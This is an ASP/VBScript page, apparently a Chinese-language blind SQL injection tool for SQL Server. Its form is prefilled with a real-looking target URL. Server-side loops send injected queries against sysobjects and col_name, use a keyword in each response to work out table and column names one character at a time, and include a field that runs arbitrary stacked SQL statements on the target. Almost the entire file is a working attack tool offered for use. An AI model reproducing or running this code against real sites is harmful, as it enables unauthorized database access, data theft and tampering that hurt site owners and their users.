<%@ Language=VBscript %>
<%
Server.scriptTimeout=999999
on error resume next
Function GetURL(url)
Set Retrieval = Server.CreateObject("Microsoft.XMLHTTP")
With Retrieval
.Open "GET", url, False, "", ""
.Send
GetURL = .ResponseText
End With
Set Retrieval = Nothing
End Functionother = request.form("other")
if session("other")<>"" then
session("other")=other
else
other="'Table1','Table2'"
session("other")=other
end if
%>
<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<style type="text/css">
<!--
body,td,input {
font-size: 12px;
margin-left: 0px;
margin-top: 0px;
}
table,textarea {
border: 1px solid #003366;
}
body {
margin-right: 0px;
margin-bottom: 0px;
}
.style1 {color: #FFFFFF}
-->
</style>
<title>ASP版SQLSERVER注射数据表结构猜解机----自个研究吧</title></HEAD>
<BODY>
<table width="760" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td align="center" style="color:#ff0000"><span id="showinfo"></span></td>
</tr>
<tr>
<td height="26" align="center" bgcolor="#003366"><span class="style1">第一步:猜解表名的长度</span></td>
</tr>
<form method="post" action="" name="Form1">
<tr>
<td height="26" align="center" title="格式:'table1','table2' 猜解出一个表就在后面加上,以此类推"><textarea name="other" cols="105" rows="9" wrap="VIRTUAL"><%=session("other")%></textarea></td>
</tr>
<tr>
<td height="26" align="center"><input name="action" value="lentable" type="hidden">action
<input name="actionurl" value="http://gxgl.com/new_add/news_list.asp?id=100'" size="35">
位数:
<input name="len1" id="len1" value="1" size="3">
-
<input name="len2" id="len2" value="20" size="3">
正确关键字:
<input name="keyword" id="keyword" value="<hr" size="20">
<input type="submit" name="Submit" value="猜解表名长度"></td>
</tr>
</form>
<form method="post" action="" name="Form2">
<input name="action" value="cracktable" type="hidden">
<tr>
<td height="26" align="center" bgcolor="#003366"><span class="style1">第二步:猜解表名的名称</span></td>
</tr>
<tr>
<td height="26" align="center" valign="baseline">
action
<input name="actionurl" id="actionurl" value="http://gxgl.com/new_add/news_list.asp?id=100'" size="60">
正确关键字
<input name="keyword" id="keyword" value="<hr" size="20"><br>
<input name="other" type="hidden" value="<%=session("other")%>">
破解位数范围:
<input name="len1" value="<%=request.form("len1")%>" size="5">
-
<input name="len2" value="<%=request.form("len2")%>" size="5">
ASCII范围:
<input name="asc1" value="47" size="5">-
<input name="asc2" value="122" size="5">
<input type="submit" name="Submit" value="开始猜解数据表名称">
</td>
</tr></form>
<form method="post" action="" name="Form3">
<input name="action" value="lencols" type="hidden">
<tr>
<td height="26" align="center" bgcolor="#003366"><span class="style1">第三步:猜解表
<input name="tablename" value="<%=request.form("tablename")%>" size="20">
的第
<input name="coln" id="coln" value="<%=request.form("coln")%>" size="5">
个字段名长度 </span></td>
</tr>
<tr>
<td height="26" align="center">action
<input name="actionurl" value="http://gxgl.com/new_add/news_list.asp?id=100'" size="40">
LEN:
<input name="len1" value="1" size="3">
-
<input name="len2" value="20" size="3">
正确关键字:
<input name="keyword" id="keyword" value="<hr" size="15">
<input type="submit" name="Submit" value="猜解字段长度"></td>
</tr>
</form>
<form method="post" action="" name="Form4">
<input name="action" value="crackcols" type="hidden">
<tr>
<td height="26" align="center" bgcolor="#003366"><span class="style1">第四步:猜解表
<input name="tablename" value="<%=request.form("tablename")%>" size="20">
的第
<input name="coln" id="coln" value="<%=request.form("coln")%>" size="5">
个字段名名称</span></td>
</tr>
<tr>
<td height="26"> action
<input name="actionurl" value="http://gxgl.com/new_add/news_list.asp?id=100'" size="26">
LEN:
<input name="len1" value="1" size="3">
-
<input name="len2" value="20" size="3">
ASCII:
<input name="asc1" value="47" size="4">
-
<input name="asc2" value="122" size="4">
正确关键字
<input name="keyword" id="keyword" value="<hr" size="15">
<input type="submit" name="Submit" value="猜解字段名称"></td>
</tr> </form>
<form method="post" action="" name="Form5">
<input name="action" value="exesql" type="hidden">
<tr>
<td height="26" align="center" bgcolor="#003366"><span class="style1">
可以在下面输入要执行的SQL语句</span></td>
</tr>
<tr>
<td height="26"><span class="style1">
</span> 注入地址:<span class="style1">
<input name="actionurl" value="http://gxgl.com/new_add/news_list.asp?id=100'" size="65">
<input name="keyword" id="keyword" value="<hr" size="20">
<input type="submit" name="Submit" value="执行SQL语句">
</span></td>
</tr>
<tr>
<td height="26"><span class="style1">
</span> SQL语句:
<span class="style1">
<input name="sqlstr" size="110">
</span></td>
</tr>
</form>
</table>
</BODY>
</HTML>
<%
action=request.form("action")
select case action
case "cracktable"
asc1=clng(request.form("asc1"))
asc2=clng(request.form("asc2"))
len1=clng(request.form("len1"))
len2=clng(request.form("len2"))
actionurl=request.form("actionurl")
URL1 = actionurl & " and ascii(substring((select top 1 name from sysobjects where xtype='u' and status>0 and name not in("&trim(session("other"))&")),"
URL2=",1))="
URL3 = "--"
KEY1 = request.form("keyword")
for ii = len1 to len2
for i=asc1 to asc2
TakenHTML = GetURL(URL1&ii&URL2&i&URL3)
if InStr(TakenHTML,KEY1) > 1 then
Response.Write "<script>showinfo.innerHTML+='"& Chr(i) &"';</script>"
Response.Flush
exit for
end if
next
next
Response.Write "<script>showinfo.innerHTML+='破解完成';</script>"
Response.Flush
case "lentable"
len1=clng(request.form("len1"))
len2=clng(request.form("len2"))
KEY1 = request.form("keyword")
actionurl=request.form("actionurl")
URL1 = actionurl & " and len((select top 1 name from sysobjects where xtype='u' and status>0 and name not in("&trim(session("other"))&")))="
URL2 = "--"
for i=len1 to len2
TakenHTML = GetURL(URL1&i&URL2)
Response.Write "<script>showinfo.innerHTML=" & i & ";</script>"
Response.Flush
if InStr(TakenHTML,KEY1) > 1 then
Response.Write "<script>showinfo.innerHTML='表名长度为" & i & "个字符';</script>"
Response.Flush
exit for
end if
next
case "lencols"
tablename = request.form("tablename")
coln = clng(request.form("coln"))
len1=clng(request.form("len1"))
len2=clng(request.form("len2"))
KEY1 = request.form("keyword")
actionurl=request.form("actionurl")
URL1 = actionurl & " and len((select top 1 col_name(object_id('"
URL2 = "'),"
URL3 = ")))="
URL4 = "--"
for i=len1 to len2
TakenHTML = GetURL(URL1&tablename&URL2&coln&URL3&i&URL4)
Response.Write "<script>showinfo.innerHTML=" & i & ";</script>"
Response.Flush
if InStr(TakenHTML,KEY1) > 0 then
Response.Write "<script>showinfo.innerHTML='字段名长度为" & i & "个字符';</script>"
Response.Flush
exit for
end if
next
case "crackcols"
tablename = request.form("tablename")
coln = clng(request.form("coln"))
len1=clng(request.form("len1"))
len2=clng(request.form("len2"))
asc1=clng(request.form("asc1"))
asc2=clng(request.form("asc2"))
KEY1 = request.form("keyword")
actionurl=request.form("actionurl")
URL1 = actionurl & " and ascii(substring((select top 1 col_name(object_id('"
URL2 = "'),"
URL3 = ")),"
URL4 = ",1))="
URL5 = "--"
for ii = len1 to len2
for i=asc1 to asc2
TakenHTML = GetURL(URL1&tablename&URL2&coln&URL3&ii&URL4&i&URL5)
if InStr(TakenHTML,KEY1) > 0 then
Response.Write "<script>showinfo.innerHTML+='" & Chr(i) & "';</script>"
Response.Flush
exit for
end if
next
next
Response.Write "<script>showinfo.innerHTML+='破解完成';</script>"
Response.Flush
case "exesql"
sqlstr = request.form("sqlstr")
actionurl=request.form("actionurl")
KEY1 = request.form("keyword")
if instr(LCase(sqlstr),"select")>0 then
URL1 = actionurl & " and exists("&sqlstr&")--"
else
URL1 = actionurl & ";"&sqlstr&";--"
end if
TakenHTML = GetURL(URL1)
if InStr(TakenHTML,KEY1) > 0 then
Response.Write "<script>showinfo.innerHTML='语句执行成功';</script>"
Response.Flush
else
Response.Write "<script>showinfo.innerHTML='语句执行失败';</script>"
Response.Flush
end if
end select
%>